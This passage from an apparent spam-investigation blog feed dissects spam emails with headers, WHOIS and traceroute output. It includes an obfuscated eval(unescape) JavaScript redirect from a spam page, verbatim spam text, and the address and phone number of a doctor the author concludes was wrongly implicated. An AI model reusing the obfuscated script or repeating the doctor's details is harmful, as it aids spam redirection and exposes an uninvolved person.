$res-&gt;status_line, "\n";&lt;br /&gt;  }&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-114400335856490711?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/114400335856490711/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=114400335856490711' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/114400335856490711'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/114400335856490711'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2006/04/fastest-most-effective-weight-loss.html' title='The Fastest, Most Effective Weight Loss Suplement'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-114198884777099429</id><published>2006-03-10T05:54:00.000-05:00</published><updated>2006-03-10T10:14:19.753-05:00</updated><title type='text'>Dr Spam?</title><content type='html'>UPDATE:&lt;br /&gt;After a lot of research I've concluded the name attached to this DNS entry &lt;br /&gt;is NOT the person behind the spamming.  Dr Carpenter should not be contacted&lt;br /&gt;in regards to this matter.  His address and phone number were easily &lt;br /&gt;found on public web sites and I believe he was simply picked to add legitimacy&lt;br /&gt;to the site.  The web site in question appears to simply harvest credit card&lt;br /&gt;numbers and is operated out of Hong Kong.  I have left the entry in tact&lt;br /&gt;so anyone can follow my line of reasoning. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;The most recent spam I investigated leaves me puzzled.  No effort to conceal activities for a pharacutical related spam and everything points to a licensed doctor in WA.  I'm really speechless.  Part of me wants to believe no doctor would be this stupid and risk his license and career.  But I must document what I found.&lt;br /&gt;The spam came on a registered email address (I forget where it's from but I believe it was a dev related mailing list.  &lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;From - Fri Mar 10 05:25:41 2006&lt;br /&gt;X-Account-Key: account3&lt;br /&gt;X-UIDL: 1141977566.9085.loop.myISP.com,S=3345&lt;br /&gt;X-Mozilla-Status: 0011&lt;br /&gt;X-Mozilla-Status2: 00000000&lt;br /&gt;Return-Path: &amp;lt;hasso@aramark.com&amp;gt;&lt;br /&gt;Delivered-To: victim@victim.com&lt;br /&gt;Received: (qmail 9077 invoked from network); 10 Mar 2006 07:59:25 -0000&lt;br /&gt;Received: from unknown (HELO aramark.com) (220.184.165.4)&lt;br /&gt; by loop.myISP.com with SMTP; Fri, 10 Mar 2006 02:59:25 -0500&lt;br /&gt;Message-ID: &amp;lt;000001c64418$79497940$328ca8c0@can55&amp;gt;&lt;br /&gt;Reply-To: "Moray Hassen" &amp;lt;hasso@aramark.com&amp;gt;&lt;br /&gt;From: "Moray Hassen" &amp;lt;hasso@aramark.com&amp;gt;&lt;br /&gt;To: victim@victim.com&lt;br /&gt;Subject: Re: ParamZcy news&lt;br /&gt;Date: Fri, 10 Mar 2006 02:58:53 -0500&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;Content-Type: multipart/alternative;&lt;br /&gt; boundary="----=_NextPart_000_0001_01C643EE.9075E240"&lt;br /&gt;X-Priority: 3&lt;br /&gt;X-MSMail-Priority: Normal&lt;br /&gt;X-Mailer: Microsoft Outlook Express 6.00.2800.1106&lt;br /&gt;X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106&lt;br /&gt;&lt;br /&gt;This is a multi-part message in MIME format.&lt;br /&gt;&lt;br /&gt;------=_NextPart_000_0001_01C643EE.9075E240&lt;br /&gt;Content-Type: text/plain;&lt;br /&gt; charset="us-ascii"&lt;br /&gt;Content-Transfer-Encoding: quoted-printable&lt;br /&gt;&lt;br /&gt;u V q a i I f i x u p m $1 k 05 (30 Ru  tabIe Qp ts)&lt;br /&gt;n V u i o a h g y r h a $ z 69 (1 Xs 0 t 5D abIets)&lt;br /&gt;k C x i c a i I n i j s $ y 99 (1 Hj 0 tabI gu ets)&lt;br /&gt;=20&lt;br /&gt;And m 5K any other http://pyp44.miltsuil.com&lt;br /&gt;&lt;br /&gt;------=_NextPart_000_0001_01C643EE.9075E240&lt;br /&gt;Content-Type: text/html;&lt;br /&gt; charset="us-ascii"&lt;br /&gt;Content-Transfer-Encoding: quoted-printable&lt;br /&gt;&lt;br /&gt;&amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&amp;gt;&lt;br /&gt;&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&lt;br /&gt;&amp;lt;META http-equiv=3DContent-Type content=3D"text/html; =&lt;br /&gt;charset=3Dus-ascii"&amp;gt;&lt;br /&gt;&amp;lt;META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR&amp;gt;&lt;br /&gt;&amp;lt;STYLE&amp;gt;&amp;lt;/STYLE&amp;gt;&lt;br /&gt;&amp;lt;/HEAD&amp;gt;&lt;br /&gt;&amp;lt;BODY bgColor=3D#ffffff&amp;gt;&lt;br /&gt;&amp;lt;DIV&amp;gt;&amp;lt;FONT face=3DArial size=3D3&amp;gt;&amp;lt;FONT color=3D#0337ED&amp;gt;&amp;lt;span style=3D" =&lt;br /&gt;float : right "&amp;gt; u &amp;lt;/span&amp;gt;V&amp;lt;span style=3D" float : right "&amp;gt; q =&lt;br /&gt;&lt;br /&gt;&amp;lt;/span&amp;gt;a&amp;lt;span style=3D" float : right "&amp;gt; i &amp;lt;/span&amp;gt;I&amp;lt;span style=3D" float =&lt;br /&gt;: right "&amp;gt; f &amp;lt;/span&amp;gt;i&amp;lt;span style=3D" float : right "&amp;gt; x &amp;lt;/span&amp;gt;u&amp;lt;span =&lt;br /&gt;style=3D" float : right "&amp;gt; p &amp;lt;/span&amp;gt;m&amp;lt;/FONT&amp;gt; &amp;lt;FONT =&lt;br /&gt;color=3D#F1420B&amp;gt;$1&amp;lt;span style=3D" float : right "&amp;gt; k &amp;lt;/span&amp;gt;05&amp;lt;/FONT&amp;gt; =&lt;br /&gt;(30&amp;lt;span style=3D" float : right "&amp;gt; Ru &amp;lt;/span&amp;gt;&amp;nbsp;tabIe&amp;lt;span style=3D" =&lt;br /&gt;float : right "&amp;gt; Qp &amp;lt;/span&amp;gt;ts)&amp;lt;/FONT&amp;gt;&amp;lt;/DIV&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;DIV&amp;gt;&amp;lt;FONT face=3DArial size=3D3&amp;gt;&amp;lt;FONT color=3D#0337ED&amp;gt;&amp;lt;span style=3D" =&lt;br /&gt;float : right "&amp;gt; n &amp;lt;/span&amp;gt;V&amp;lt;span style=3D" float : right "&amp;gt; u =&lt;br /&gt;&amp;lt;/span&amp;gt;i&amp;lt;span style=3D" float : right "&amp;gt; o &amp;lt;/span&amp;gt;a&amp;lt;span style=3D" float =&lt;br /&gt;: right "&amp;gt; h &amp;lt;/span&amp;gt;g&amp;lt;span style=3D" float : right "&amp;gt; y &amp;lt;/span&amp;gt;r&amp;lt;span =&lt;br /&gt;style=3D" float : right "&amp;gt; h &amp;lt;/span&amp;gt;a&amp;lt;/FONT&amp;gt; &amp;lt;FONT =&lt;br /&gt;color=3D#F1420B&amp;gt;$&amp;lt;span style=3D" float : right "&amp;gt; z &amp;lt;/span&amp;gt;69&amp;lt;/FONT&amp;gt; =&lt;br /&gt;(1&amp;lt;span style=3D" float : right "&amp;gt; Xs &amp;lt;/span&amp;gt;0&amp;nbsp;t&amp;lt;span style=3D" =&lt;br /&gt;float : right "&amp;gt; 5D &amp;lt;/span&amp;gt;abIets)&amp;lt;/FONT&amp;gt;&amp;lt;/DIV&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;DIV&amp;gt;&amp;lt;FONT face=3DArial size=3D3&amp;gt;&amp;lt;FONT color=3D#0337ED&amp;gt;&amp;lt;span style=3D" =&lt;br /&gt;float : right "&amp;gt; k &amp;lt;/span&amp;gt;C&amp;lt;span style=3D" float : right "&amp;gt; x =&lt;br /&gt;&amp;lt;/span&amp;gt;i&amp;lt;span style=3D" float : right "&amp;gt; c &amp;lt;/span&amp;gt;a&amp;lt;span style=3D" float =&lt;br /&gt;: right "&amp;gt; i &amp;lt;/span&amp;gt;I&amp;lt;span style=3D" float : right "&amp;gt; n &amp;lt;/span&amp;gt;i&amp;lt;span =&lt;br /&gt;style=3D" float : right "&amp;gt; j &amp;lt;/span&amp;gt;s&amp;lt;/FONT&amp;gt; &amp;lt;FONT =&lt;br /&gt;color=3D#F1420B&amp;gt;$&amp;lt;span style=3D" float : right "&amp;gt; y &amp;lt;/span&amp;gt;99&amp;lt;/FONT&amp;gt; =&lt;br /&gt;(1&amp;lt;span style=3D" float : right "&amp;gt; Hj &amp;lt;/span&amp;gt;0&amp;nbsp;tabI&amp;lt;span style=3D" =&lt;br /&gt;float : right "&amp;gt; gu &amp;lt;/span&amp;gt;ets)&amp;lt;/FONT&amp;gt;&amp;lt;/DIV&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;DIV&amp;gt;&amp;lt;FONT face=3DArial size=3D3&amp;gt;&amp;lt;/FONT&amp;gt;&amp;nbsp;&amp;lt;/DIV&amp;gt;&lt;br /&gt;&amp;lt;DIV&amp;gt;&amp;lt;FONT face=3DArial size=3D3&amp;gt;And m&amp;lt;span style=3D" float : right "&amp;gt; =&lt;br /&gt;5K &amp;lt;/span&amp;gt;any other &amp;lt;A =&lt;br /&gt;href=3D"http://pyp44.miltsuil.com"&amp;gt;http://pyp44.miltsuil.com&amp;lt;/A&amp;gt;&amp;lt;/FONT&amp;gt;&amp;lt;/=&lt;br /&gt;DIV&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;------=_NextPart_000_0001_01C643EE.9075E240--&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;The link leads to the miltsuil.com site and aside from a simple redirect the entire operation is straighforward.  a trip to SamSpade yields the following:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;Server Used: [ whois.yesnic.com ]&lt;br /&gt;&lt;br /&gt;miltsuil.com = [ 59.148.144.203 ] &lt;br /&gt; ----------------------------------------------- &lt;br /&gt;  Queried Domain Information as follows &lt;br /&gt;  ----------------------------------------------- &lt;br /&gt;  Domain Name : miltsuil.com &lt;br /&gt;  : :Registrant: : &lt;br /&gt;   Name      : Richard Carpenter &lt;br /&gt;   Email     : ostalana@yahoo.com&lt;br /&gt; &lt;br /&gt;   Address   : 824 S. 295th PL &lt;br /&gt;   Zipcode   : 98003 &lt;br /&gt;   Nation    : US &lt;br /&gt;   Tel       : 253-941-4749 &lt;br /&gt;   Fax       : &lt;br /&gt;  : :Administrative Contact: : &lt;br /&gt;   Name      : Richard Carpenter &lt;br /&gt;   Email     : ostalana@yahoo.com&lt;br /&gt; &lt;br /&gt;   Address   : 824 S. 295th PL &lt;br /&gt;   Zipcode   : 98003 &lt;br /&gt;   Nation    : US &lt;br /&gt;   Tel       : 253-941-4749 &lt;br /&gt;   Fax       : &lt;br /&gt;  : :Technical Contact: : &lt;br /&gt;   Name      : Richard Carpenter &lt;br /&gt;   Email     : ostalana@yahoo.com&lt;br /&gt; &lt;br /&gt;   Address   : 824 S. 295th PL &lt;br /&gt;   Zipcode   : 98003 &lt;br /&gt;   Nation    : US &lt;br /&gt;   Tel       : 253-941-4749 &lt;br /&gt;   Fax       : &lt;br /&gt;  : :Name Servers: : &lt;br /&gt;   ns0.acorande.com &lt;br /&gt;   ns0.enanger.com &lt;br /&gt;  : :Dates &amp; Status: : &lt;br /&gt;   Created Date   2006-03-07 16: 02: 33 EST &lt;br /&gt;   Updated Date   2006-03-07 16: 02: 33 EST &lt;br /&gt;   Valid Date     2007-03-07 16: 02: 33 EST &lt;br /&gt;   Status         ACTIVE &lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;It's creepy to see a real name and address.  I search for the name and phone number listed only to find a list of Family Doctors in WA!  &lt;a href="http://washington.doctorsrealm.com/familypractice/WA/FederalWay.html"&gt; See list here &lt;/a&gt;&lt;br&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;Carpenter, Richard M&lt;br /&gt;30809 1st Ave S&lt;br /&gt;Federal Way, WA 98003-0000&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;Phonebook results for 253-941-4749&lt;br /&gt; E Carpenter, (253) 941-4749, , Federal Way, WA 98003&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Either this is a very well put together frame (do people get framed for spam??) or this doctor has decided to supplement his income.  It's possible since a doctor could get away with creating false prescriptions by the  thousands.  A doctor in the east coast (New York?) was busted for this last year.  But what idiot would attempt this today??&lt;br&gt;&lt;br /&gt;I'm keeping watch over this server and will report any findings.  I may have 'scoop' on this one :), the DNS record is barely 48 hours old!&lt;br /&gt;&lt;br /&gt;Update: I think this is a setup by Chinese spammers.  It was just way to easy and that bugged me from the start.  A traceroute shows this&lt;br /&gt;&lt;br /&gt; 4  ge-0-1-0-030.br2.qcy1.ma.gnaps.net (199.232.44.141)  6.683 ms  6.390 ms  6.565 ms&lt;br /&gt; 5  POS3-0.GW5.BOS4.ALTER.NET (208.192.182.173)  8.11 ms  7.466 ms  8.186 ms&lt;br /&gt; 6  0.so-2-0-0.CL1.BOS4.ALTER.NET (152.63.25.70)  8.315 ms  23.281 ms  21.669 ms&lt;br /&gt; 7  0.so-4-0-0.XL1.SAC1.ALTER.NET (152.63.53.245)  98.949 ms  96.628 ms  102.104 ms&lt;br /&gt; 8  POS6-0.IG3.SAC1.ALTER.NET (152.63.54.121)  93.654 ms  106.122 ms  98.970 ms&lt;br /&gt; 9  hkbn-gw.customer.alter.net (208.214.139.106)  268.645 ms  280.339 ms  275.420 ms&lt;br /&gt;10  61.244.232.105 (61.244.232.105)  295.729 ms  255.630 ms  261.515 ms&lt;br /&gt;11  61.244.232.170 (61.244.232.170)  267.802 ms  254.997 ms  256.17 ms&lt;br /&gt;12  059148144203.ctinets.com (59.148.144.203)  262.475 ms  259.126 ms  253.566 ms&lt;br /&gt;&lt;br /&gt;http://www.google.com/search?hl=en&amp;lr=&amp;client=safari&amp;rls=en&amp;q=site:ctinets.com&lt;br /&gt;shows that the citnets site is clearly from China.&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-114198884777099429?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/114198884777099429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=114198884777099429' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/114198884777099429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/114198884777099429'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2006/03/dr-spam.html' title='Dr Spam?'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-113401797120958044</id><published>2005-12-07T23:51:00.000-05:00</published><updated>2005-12-07T23:59:31.220-05:00</updated><title type='text'>Welcome to the Victims side</title><content type='html'>I have been using a hosted server for the last few years.  They provide me with cheap presence on the net and they even allow for lots of email address (technically unlimited).  Over the last few days my "bounce account" has been flooded every morning.  I didn't know what to make of it at first.  Maybe someone tracked me down via this blog (not impossible) and decided to exact some revenge.  Spammers are scummy people to begin with so I wouldn't put this past them.  Maybe someone was just flooding me directly?&lt;br /&gt;Today I noticed a strange pattern in the bounce messages.  They all were from a specific company (which I can't name) and looked pretty legitamate.  So I looked into the email (with a hex editor) and it was authentic.  My heart sank as I realized I was now a victim.  My mail server had been coerced into helping these assholes.  Since the server is hosted there isn't much I can do from here.  I don't have direct access to the mail server in question so I can't shutdown SMTP or even investigate the logs.  All I can do is issue help requests and wait.  I have started tracking down the multiple mirrors of this particular spam in online mailing list archives.  I'm doing what I can to contact the other domain name admins who seem to have been affected.&lt;br /&gt;This may be the final straw for me to start running my own mail server.&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-113401797120958044?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/113401797120958044/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=113401797120958044' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/113401797120958044'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/113401797120958044'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/12/welcome-to-victims-side.html' title='Welcome to the Victims side'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-113309770048198373</id><published>2005-11-27T08:07:00.000-05:00</published><updated>2005-11-27T08:27:06.390-05:00</updated><title type='text'>powerful enlargement</title><content type='html'>X-Account-Key: account2&lt;br /&gt;X-UIDL: 1132365525.24507.victim.com,S=1554&lt;br /&gt;X-Mozilla-Status: 0000&lt;br /&gt;X-Mozilla-Status2: 00000000&lt;br /&gt;Return-Path: &lt;colleenia@zipmail.com.br&gt;&lt;br /&gt;Delivered-To: victim@4&lt;br /&gt;Received: (qmail 24497 invoked from network); 19 Nov 2005 01:58:44 -0000&lt;br /&gt;Received: from unknown (HELO zipmail.com.br) (60.171.109.114)&lt;br /&gt; by victim.com with SMTP; Fri, 18 Nov 2005 20:58:44 -0500&lt;br /&gt;Message-ID: &lt;AC6668EB.E35C94D@zipmail.com.br&gt;&lt;br /&gt;Date: Fri, 18 Nov 2005 07:32:47 +0800&lt;br /&gt;From: "madonna black" &lt;colleenia@zipmail.com.br&gt;&lt;br /&gt;User-Agent: MOMENTUM (3.0 build(25) [Asynch])&lt;br /&gt;X-Accept-Language: en-us&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;To: "Victim Victim" &lt;victim@victim.com&gt;&lt;br /&gt;Subject: powerful enlargement&lt;br /&gt;Content-Type: text/plain;&lt;br /&gt; charset="us-ascii"&lt;br /&gt;Content-Transfer-Encoding: 7bit&lt;br /&gt;&lt;br /&gt;Male enhancement is achieving your goals of becoming a better man&lt;br /&gt;&lt;br /&gt;90% of males were interested in improving their sexual stamina,&lt;br /&gt;performance, and the size of their manhood. Are you one of the 90%?&lt;br /&gt;&lt;br /&gt;You guys have made my dreams come true. I have been self-conscience for as&lt;br /&gt;long as I can remember. I did not want to shower with other guys growing up,&lt;br /&gt;because I was embarrassed. Not only has your system increased the size of my&lt;br /&gt;manhood while erect, but it has helped my size while flaccid as well. I hang&lt;br /&gt;bigger, and I feel more like the man I should have been all these years. The&lt;br /&gt;change is tremendous, I wanted to send you this note to let you know what it&lt;br /&gt;has done for me, and of course to order more LONGZ! Leroy, Brooklyn&lt;br /&gt;&lt;br /&gt;check out the only Male Enhancement formula with a free DVD&lt;br /&gt;&lt;br /&gt;http://geocities.yahoo.com.br/clifton_smothers/?7=X2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;not for you, then use link above&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The President bowed gravely. This is your invention? he asked&lt;br /&gt;No; I'm hardly equal to that&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;FONT SIZE=8&gt;Please wait while the web page loads&lt;/FONT&gt;&lt;br /&gt;&lt;p&gt;&lt;FONT face=Arial size=2&gt;&lt;FONT face="Times New Roman" size=3&gt;In a market research, men identified three things &lt;br /&gt;as essential elements of achieving a satisfactory erection, including:&lt;/FONT&gt;&lt;br /&gt;&lt;UL class=standard-text&gt;&lt;br /&gt;  &lt;LI&gt;The ability to attain an erection &lt;br /&gt;  &lt;LI&gt;Erection hardness &lt;br /&gt;  &lt;LI&gt;The ability to maintain it for satisfactory sex &lt;/LI&gt;&lt;/UL&gt;&lt;br /&gt;&lt;P class=standard-text&gt;Taken together these make up erection quality (EQ).&lt;/P&gt;&lt;br /&gt;&lt;P class=standard-text&gt;Many men have been, or will be, concerned with the &lt;br /&gt;quality of their erection at some time in their life. It may be an occasional &lt;br /&gt;difficulty in getting or maintaining an erection; it could be an erection that &lt;br /&gt;is just not as hard as it once was; or it may be a consistent inability to &lt;br /&gt;achieve an erection. &lt;/P&gt;&lt;br /&gt;&lt;P class=standard-text&gt;It is estimated that over 30 million men in the US have &lt;br /&gt;experienced at least partial erectile dysfunction (ED).&lt;!--(&lt;a href="../references.htm#7"&gt;7&lt;/a&gt;)--&gt; You are not alone if you &lt;br /&gt;experience a loss of erectile function.&lt;/P&gt;&lt;br /&gt;&lt;P class=standard-text&gt;Fortunately, if you've noticed changes in your erection &lt;br /&gt;there is something you can do about it, talk to your &lt;br /&gt;doctor.&lt;/P&gt;&lt;/FONT&gt;&lt;br /&gt;&lt;br /&gt;The technique used by this spammer is called obfusication and we have been talking about this a lot in this particular blog.  A quick refresher for those who are a little rusty on the unescape javascript function can be found here&lt;br /&gt;&lt;br /&gt;JavaScript unescape&lt;br /&gt;Answer: To convert a string from URL-encoded form, use the JavaScript function&lt;br /&gt;unescape(string) . This function works as follows: if the string contains ...&lt;br /&gt;www.javascripter.net/faq/unescape.htm - 3k - Cached - Similar pages&lt;br /&gt;&lt;br /&gt;eval(unescape("\x76\x61\x72\x25\x32\x30\x55\x52\x49\x25\x33\x42\x25\x30\x44\x25&lt;br /&gt;\x30\x41\x76\x61\x72\x25\x32\x30\x53\x43\x52\x49\x50\x54\x5F\x4E\x41\x4D\x45\x25&lt;br /&gt;\x33\x42\x25\x30\x44\x25\x30\x41\x76\x61\x72\x25\x32\x30\x51\x55\x45\x52\x59\x5F&lt;br /&gt;\x53\x54\x52\x49\x4E\x47\x25\x33\x42\x25\x30\x44\x25\x30\x41\x76\x61\x72\x25\x32&lt;br /&gt;\x30\x5F\x47\x45\x54\x25\x33\x44\x6E\x65\x77\x25\x32\x30\x41\x72\x72\x61\x79\x25&lt;br /&gt;\x32\x38\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x66\x75\x6E\x63\x74\x69&lt;br /&gt;\x6F\x6E\x25\x32\x30\x5F\x63\x67\x69\x5F\x70\x61\x72\x73\x65\x5F\x61\x72\x67\x73&lt;br /&gt;\x25\x32\x38\x25\x32\x39\x25\x37\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x76\x61&lt;br /&gt;\x72\x25\x32\x30\x69\x25\x32\x43\x74\x6D\x70\x25\x32\x43\x74\x6D\x70\x32\x25\x32&lt;br /&gt;\x43\x74\x6D\x70\x33\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x74\x72\x79&lt;br /&gt;\x25\x37\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x55\x52\x49\x25\x33\x44\x6C\x6F&lt;br /&gt;\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x25\x33\x42\x25\x30\x44\x25\x30\x41&lt;br /&gt;\x25\x30\x39\x74\x6D\x70\x25\x33\x44\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x73\x65&lt;br /&gt;\x61\x72\x63\x68\x2E\x73\x75\x62\x73\x74\x72\x25\x32\x38\x31\x25\x32\x43\x6C\x6F&lt;br /&gt;\x63\x61\x74\x69\x6F\x6E\x2E\x73\x65\x61\x72\x63\x68\x2E\x6C\x65\x6E\x67\x74\x68&lt;br /&gt;\x2D\x31\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x74\x6D\x70&lt;br /&gt;\x32\x25\x33\x44\x74\x6D\x70\x2E\x73\x70\x6C\x69\x74\x25\x32\x38\x25\x32\x32\x25&lt;br /&gt;\x32\x36\x25\x32\x32\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39&lt;br /&gt;\x66\x6F\x72\x25\x32\x38\x69\x25\x33\x44\x30\x25\x33\x42\x69\x25\x33\x43\x74\x6D&lt;br /&gt;\x70\x32\x2E\x6C\x65\x6E\x67\x74\x68\x25\x33\x42\x69\x2B\x2B\x25\x32\x39\x25\x37&lt;br /&gt;\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x25\x30\x39\x74\x6D\x70\x33\x25\x33\x44&lt;br /&gt;\x74\x6D\x70\x32\x25\x35\x42\x69\x25\x35\x44\x2E\x73\x70\x6C\x69\x74\x25\x32\x38&lt;br /&gt;\x25\x32\x32\x25\x33\x44\x25\x32\x32\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30&lt;br /&gt;\x41\x25\x30\x39\x25\x30\x39\x5F\x47\x45\x54\x25\x35\x42\x74\x6D\x70\x33\x25\x35&lt;br /&gt;\x42\x30\x25\x35\x44\x25\x35\x44\x25\x33\x44\x74\x6D\x70\x33\x25\x35\x42\x31\x25&lt;br /&gt;\x35\x44\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x25\x37\x44\x25\x30\x44&lt;br /&gt;\x25\x30\x41\x25\x30\x39\x25\x37\x44\x63\x61\x74\x63\x68\x25\x32\x38\x65\x25\x32&lt;br /&gt;\x39\x25\x37\x42\x61\x6C\x65\x72\x74\x25\x32\x38\x65\x2E\x64\x65\x73\x63\x72\x69&lt;br /&gt;\x70\x74\x69\x6F\x6E\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x30\x44\x25\x30\x41&lt;br /&gt;\x25\x37\x44\x25\x30\x44\x25\x30\x41\x5F\x63\x67\x69\x5F\x70\x61\x72\x73\x65\x5F&lt;br /&gt;\x61\x72\x67\x73\x25\x32\x38\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x76&lt;br /&gt;\x61\x72\x25\x32\x30\x71\x25\x32\x30\x25\x33\x44\x25\x32\x30\x25\x32\x32\x37\x25&lt;br /&gt;\x32\x32\x25\x33\x42\x25\x30\x44\x25\x30\x41\x69\x66\x25\x32\x38\x5F\x47\x45\x54&lt;br /&gt;\x25\x35\x42\x71\x25\x35\x44\x25\x32\x39\x25\x37\x42\x25\x30\x44\x25\x30\x41\x25&lt;br /&gt;\x30\x39\x76\x61\x72\x25\x32\x30\x70\x72\x65\x66\x69\x78\x25\x32\x30\x25\x33\x44&lt;br /&gt;\x25\x32\x30\x25\x32\x37\x68\x74\x74\x70\x25\x33\x41\x2F\x2F\x77\x77\x77\x2E\x25&lt;br /&gt;\x32\x37\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x64\x6F\x63\x75\x6D\x65&lt;br /&gt;\x6E\x74\x2E\x74\x69\x74\x6C\x65\x25\x33\x44\x25\x32\x32\x4C\x6F\x6E\x67\x25\x32&lt;br /&gt;\x30\x4D\x61\x6C\x65\x25\x32\x30\x45\x6E\x68\x61\x6E\x63\x65\x6D\x65\x6E\x74\x25&lt;br /&gt;\x32\x32\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x76\x61\x72\x25\x32\x30&lt;br /&gt;\x74\x64\x6F\x6D\x61\x69\x6E\x73\x25\x32\x30\x25\x33\x44\x25\x32\x30\x6E\x65\x77&lt;br /&gt;\x25\x32\x30\x41\x72\x72\x61\x79\x25\x32\x38\x25\x32\x39\x25\x33\x42\x25\x30\x44&lt;br /&gt;\x25\x30\x41\x25\x30\x39\x74\x64\x6F\x6D\x61\x69\x6E\x73\x25\x35\x42\x74\x64\x6F&lt;br /&gt;\x6D\x61\x69\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68\x25\x35\x44\x25\x33\x44\x25\x32&lt;br /&gt;\x37\x6C\x6F\x77\x70\x72\x69\x63\x65\x73\x6F\x6E\x70\x6C\x61\x74\x69\x6E\x75\x6D&lt;br /&gt;\x73\x2E\x63\x6F\x6D\x2F\x6C\x7A\x25\x32\x37\x25\x33\x42\x25\x30\x44\x25\x30\x41&lt;br /&gt;\x25\x30\x39\x74\x64\x6F\x6D\x61\x69\x6E\x73\x25\x35\x42\x74\x64\x6F\x6D\x61\x69&lt;br /&gt;\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68\x25\x35\x44\x25\x33\x44\x25\x32\x37\x6F\x75&lt;br 